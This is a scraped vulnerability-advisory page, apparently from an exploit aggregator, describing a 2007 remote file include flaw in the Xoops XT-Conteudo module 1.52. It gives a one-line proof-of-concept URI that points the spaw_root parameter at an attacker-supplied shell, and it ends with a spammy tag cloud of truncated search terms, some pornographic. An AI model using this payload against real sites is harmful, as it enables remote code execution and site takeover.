about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Xoops XT-Conteudo Module Spaw_Control.Class.PHP Remote File Include Vulnerability


Title Xoops XT-Conteudo Module Spaw_Control.Class.PHP Remote File Include Vulnerability
Published 2007-06-14-12:00AM
Updated 2007-06-14-12:00AM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  g00ns is credited with the discovery of this vulnerability.
Vulnerable  Xoops XTConteudo Module 1.52
Not Vulnerable  
Code   Attackers can use a browser to exploit this issue.

The following proof-of-concept URI is available:

http://www.example.com/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=[ shell ]
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Wed, 16 Dec 2009 14:32:45 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
0000 php nuke s www.web-sh php 4.4.4 Tagger LE. lo447l news for c www.sekpor php%20html Sex garl free sexy Wanita tan www.89 xxx news for C meirongwan jilbab news for c shop sql e www.oubeis News Searc kernel 5.1 www.cnsfx8 PHP-Nuke 8 ibProArcad Fukgirks saxy girl Debian Sar www.banatf Security.g mambo Remo need for s sexiemag Dhoodwali. Naked girl COUNTER nuz Vidio+mesu www.gzsang Ayesha tak webwasher sexy pitur ssh_4.3 w.w.w.xxxm LCC-win32 www.9966la news for c bolywoodse sex //movi www.Hotsex www,free.f